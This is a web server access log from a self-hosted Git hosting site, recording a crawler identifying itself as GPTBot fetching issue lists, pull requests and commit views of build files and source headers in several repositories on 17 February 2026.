"/windpacer/AssetPilot/issues?assignee=1&state=open&type=all" [Client 74.7.227.38] [Length 10132] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" -[17/Feb/2026:17:37:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&state=open&type=all" [Client 74.7.227.38] [Length 9964] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls" -[17/Feb/2026:17:37:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/.Notebook/OpcTest%20program%20by%20claude.md" [Client 74.7.227.38] [Length 14260] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/OpcTest%20program%20by%20claude.md" -[17/Feb/2026:17:37:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/.Notebook/OpcTest%20program%20by%20claude.md" [Client 74.7.227.38] [Length 929] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/OpcTest%20program%20by%20claude.md" -[17/Feb/2026:17:37:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-next-todo.md?display=rendered" [Client 74.7.227.38] [Length 11768] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-next-todo.md" -[17/Feb/2026:17:37:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-next-todo.md?display=rendered" [Client 74.7.227.38] [Length 11768] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-next-todo.md" -[17/Feb/2026:17:37:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9960] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:17:37:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2?files=git%20%ec%84%9c%eb%b2%84%20%ec%82%ac%ec%9a%a9%eb%b2%95%20%eb%8c%80%ed%99%94%20%eb%b3%b4%ea%b4%80%2fWireguard%20%ec%84%a4%ec%a0%95%20%eb%b0%a9%eb%b2%95.txt" [Client 74.7.227.38] [Length 21122] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:17:37:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:17:37:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11132] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:17:37:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 13942] [Gzip 3.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:17:37:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 13941] [Gzip 3.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:17:37:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 13911] [Gzip 3.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:17:37:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12033] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:17:37:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12031] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:17:37:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12004] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:17:37:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12033] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:17:37:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9969] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:17:37:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12033] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:17:37:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:17:37:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:17:37:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 9925] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" -[17/Feb/2026:17:37:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 9924] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" -[17/Feb/2026:17:37:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 9890] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" -[17/Feb/2026:17:37:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 13662] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" -[17/Feb/2026:17:37:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 13694] [Gzip 6.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" -[17/Feb/2026:17:37:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 13693] [Gzip 6.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" -[17/Feb/2026:17:37:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 6985] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" -[17/Feb/2026:17:37:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 6985] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" -[17/Feb/2026:17:37:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 6985] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" -[17/Feb/2026:17:37:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:17:38:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12030] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:17:38:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:17:38:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11111] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:17:38:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11111] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:17:38:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11111] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:17:38:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:17:38:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12025] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:17:38:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12027] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:17:38:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:38:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%20PostgreSQL%20%EC%9E%91%EC%97%85.md?display=rendered" [Client 74.7.227.38] [Length 12178] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%20PostgreSQL%20%EC%9E%91%EC%97%85.md" -[17/Feb/2026:17:38:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:38:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 11122] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/index.tsx" -[17/Feb/2026:17:38:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11015] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/controller.cpp" -[17/Feb/2026:17:38:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11148] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:38:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12024] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:17:38:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12024] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:17:38:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12024] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:17:38:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr 